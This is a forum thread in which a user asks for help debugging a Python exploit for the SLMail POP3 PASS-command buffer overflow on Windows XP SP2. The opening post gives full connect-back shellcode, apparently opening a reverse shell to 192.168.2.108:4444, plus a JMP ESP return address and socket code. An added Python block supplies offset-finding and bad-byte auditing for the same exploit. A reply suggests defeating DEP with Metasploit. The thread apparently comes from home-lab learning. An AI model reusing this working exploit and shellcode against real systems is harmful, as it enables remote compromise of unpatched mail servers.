Page 1 of 2, results 1 to 10 of 17

Thread: Please help


  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    6

    Please help

    The target is an XP SP2 machine running an SLMail server, which I know is vulnerable to a buffer overflow in the PASS command. So I whipped up the following script:
    #!/usr/bin/env python3
    import socket
    import struct

    # Payload exactly as posted; it is not regenerated or altered here.
    shellcode = (b"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24"
                 b"\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f"
                 b"\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84"
                 b"\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28"  # contains \x0d (CR), which a line-based POP3 parser treats as end of command
                 b"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c"
                 b"\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64"
                 b"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e"
                 b"\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
                 b"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50"
                 b"\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff"
                 b"\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43"
                 b"\x53\x43\x53\xff\xd0\x68\xc0\xa8\x02\x6c\x66\x68\x11\x5c"  # pushes c0 a8 02 6c (192.168.2.108) and 11 5c (port 4444) for the connect-back
                 b"\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a"
                 b"\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50"
                 b"\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95"
                 b"\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
                 b"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51"
                 b"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05"
                 b"\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6"
                 b"\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a"
                 b"\x04\x5f\x53\xff\xd6\xff\xd0")

    # where 0x01c7a18b is a JMP ESP in user32.dll on xp sp2
    # buffer = b"\x41" * 4654 + struct.pack("<L", 0x01c7a18b) + b"\x90" * 16 + shellcode
    # test buffer: 4654 bytes of filler, four B's that land in EIP, 48 C's after it
    buffer = b"\x41" * 4654 + b"\x42" * 4 + b"\x43" * 48

    print("\nSending evil buffer...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.2.104", 110))
    data = s.recv(1024)                    # POP3 greeting banner
    s.sendall(b"USER ftp\r\n")
    data = s.recv(1024)                    # +OK reply to USER
    s.sendall(b"PASS " + buffer + b"\r\n")
    data = s.recv(1024)                    # may never arrive once the service has crashed
    s.close()
    The resulting crash shows my four B's sitting pretty in EIP, but when I pass the address of a JMP ESP in user32.dll (done in this case by changing the commented line), the resulting crash holds a different address in EIP which does not point towards my shellcode.
    I am certain that someone will point out my stupid mistake easily, but I have been working on this all day and still it does not work...
    Thanks in advance for the help,
    Ey3l45h
    Last edited by ey3l45h; January 7th, 2010 at 04:17 PM. Reason: I copied and pasted the wrong version of the script.
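Two checks that bear on the question in this post, given here as an added example (Python 3) and not as code from the thread, from SLMail, or from any tool named in it: first, the cyclic-pattern way of confirming the EIP offset rather than inferring it from the run of B's; second, a scan of the finished PASS buffer for bytes a line-based POP3 parser cannot carry in a command argument. The bad-byte set (\x00, \x0a, \x0d), every function name, and SAMPLE_SHELLCODE are assumptions for illustration; the sample payload is constructed and only borrows the byte sequence \xc1\xca\x0d that appears in the posted shellcode, so the scan flags it.

```python
#!/usr/bin/env python3
"""Pre-flight checks for a stack-overflow buffer sent over POP3.

Added example, not code from the thread. Function names, the sample payload
and the bad-byte set are assumptions for illustration.
"""
import string
import struct

# Bytes a line-oriented text protocol cannot carry inside a command argument:
# NUL ends a C string, CR and LF end the command line. Assumed set; the real
# check is a full 0x01..0xff sweep against the target in a debugger.
POP3_BAD_BYTES = b"\x00\x0a\x0d"

# Constructed stand-in for the posted shellcode. It reuses the "\xc1\xca\x0d"
# sequence from the original payload so the scan below has something to find.
SAMPLE_SHELLCODE = b"\x31\xc0\x99\xc1\xca\x0d\x01\xc2"


def cyclic_pattern(length):
    """Metasploit-style non-repeating pattern (Aa0Aa1...Zz9), up to 20280 bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, eip_value):
    """Offset of the four pattern bytes that landed in EIP (read little-endian), or -1."""
    needle = struct.pack("<I", eip_value)
    return pattern.find(needle)


def find_bad_bytes(buf, bad=POP3_BAD_BYTES):
    """Every (offset, byte) in buf that the protocol would cut or mangle."""
    return [(i, b) for i, b in enumerate(buf) if b in bad]


def pack_addr(addr):
    """Return address as the four little-endian bytes that overwrite saved EIP."""
    return struct.pack("<I", addr)


def build_buffer(offset, ret_addr, nop_sled, shellcode, filler=b"\x41"):
    """filler * offset | ret_addr (LE) | NOP sled | shellcode."""
    return filler * offset + pack_addr(ret_addr) + b"\x90" * nop_sled + shellcode


def audit_buffer(offset, ret_addr, nop_sled, shellcode, bad=POP3_BAD_BYTES):
    """Build the PASS argument and report what would break it on the wire."""
    buf = build_buffer(offset, ret_addr, nop_sled, shellcode)
    sc_start = offset + 4 + nop_sled
    return {
        "length": len(buf),
        "eip_bytes": buf[offset:offset + 4],
        "bad_in_ret_addr": find_bad_bytes(pack_addr(ret_addr), bad),
        "bad_in_shellcode": [(sc_start + i, b) for i, b in find_bad_bytes(shellcode, bad)],
        "bad_total": len(find_bad_bytes(buf, bad)),
    }


if __name__ == "__main__":
    # 1. Offset from a crash: send cyclic_pattern(5000) as the PASS argument and
    #    read EIP in the debugger. 0x7a46317a is the value this pattern leaves
    #    in EIP when the overwrite starts at byte 4654 (the window "z1Fz").
    pat = cyclic_pattern(5000)
    print("EIP offset:", pattern_offset(pat, 0x7a46317a))

    # 2. Audit the real buffer with the numbers from the post (return address
    #    0x01c7a18b, 16-byte sled) and the constructed sample payload.
    report = audit_buffer(4654, 0x01c7a18b, 16, SAMPLE_SHELLCODE)
    for key, value in report.items():
        print(f"{key}: {value!r}")
```

If `bad_in_ret_addr` or `bad_in_shellcode` is non-empty, the bytes after the first hit never reach the vulnerable copy, so the crash you see is not the crash you built. The offset check belongs in the same loop: confirm it with the pattern before trusting the four-byte write at all.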

  2. #2
    StOrM™
    Join Date
    Aug 2004
    Posts
    1,003
    You are obviously going to get banned if you don't remove that. While I am sure you are not going to read this, anyway: http://antionline.com/faq.php?faq=vb...eading_posting
    Parth Maniar,
    CISSP, CISM, CISA, SSCP

    *Thank you GOD*

    Greater the Difficulty, SWEETER the Victory.

    Believe in yourself.

  3. #3
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    If he's the owner of the machine he's attempting this on, there isn't any law being broken. Wasn't asked in the best manner, but, if the machine is his, there shouldn't be an issue. Other than others here probably not wanting to answer since we have a corporate owner who has to be responsible for any problems on here. The staff here are generally into the stuff we do here (I mean the staff, the mods obviously have an interest) but their bosses, probably not heh.
    Kill the lights, let the candles burn behind the pumpkins' mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again every day is Halloween. The Misfits
    FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

  4. #4
    Junior Member
    Join Date
    Jan 2010
    Posts
    6
    @byte~ I am sorry, I did not see anywhere in the rules where it said that one could not post educational projects. Of course this is for practice on my home lab. If you could please link me to something which shows a rule I have broken, I would be the first to remove my post. Thanks for the flaming.
    @gore~ I recognize that I could have worded that better. I have been a long-time reader of AO and this was my first post. If you have some advice which would help in the future, or maybe some other forums which would be able to help, I would love to hear it.

    The question still stands: I still don't know why the address I am entering is destroying the stack in such a way that I cannot get to my JMP ESP.

    k thanx bye,

    ey3l45h

  5. #5
    Senior Member t34b4g5's Avatar
    Join Date
    Sep 2003
    Location
    Australia.
    Posts
    2,391


    Quote Originally Posted by ey3l45h View Post
    If you could please link me to something which shows a rule I have broken I would be the first to remove my post. Thanks for the flaming.
    Acceptable Use Policy
    (Bottom of the page)


    As Gore mentioned, AntiOnline is owned and run by a corporate company.

    About Internet.com
    Copyright 2010 QuinStreet Inc. All Rights Reserved.

    No need to remove the post; I'm interested to see where this goes.

  6. #6
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    I didn't see a problem with it so I left it alone too. He owns the machine and is simply trying to learn something, and isn't breaking any laws since, again, the machine is his, so he can do with it what he likes. So I just left it alone to grow lol.

  7. #7
    Banned
    Join Date
    Jan 2008
    Posts
    605
    actually once it crashed EIP held "00000000"
    It's supposed to do that, since it's no longer held in memory. Without the process up and running there would be no need to store a memory address.

  8. #8
    Banned
    Join Date
    Jan 2008
    Posts
    605
    Doesn't even look like the shell is sent to anything at all. It just looks like an unused string in this script to me.

  9. #9
    Junior Member
    Join Date
    Jan 2010
    Posts
    6
    @~Spec You are right; I was changing a few things and am about to edit that... It did get sent in the script that I ran; I accidentally did not add it to the end of the commented line...

  10. #10
    Banned
    Join Date
    Nov 2002
    Posts
    677
    Not sure, but can this be of any service to you?
    Data Execution Prevention (DEP) is a security feature included in modern Microsoft Windows operating systems that is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow, for example.
    http://en.wikipedia.org/wiki/Data_Execution_Prevention

    I believe Metasploit has some wrappers to defeat this protection. Just convert the script procedure into your code.
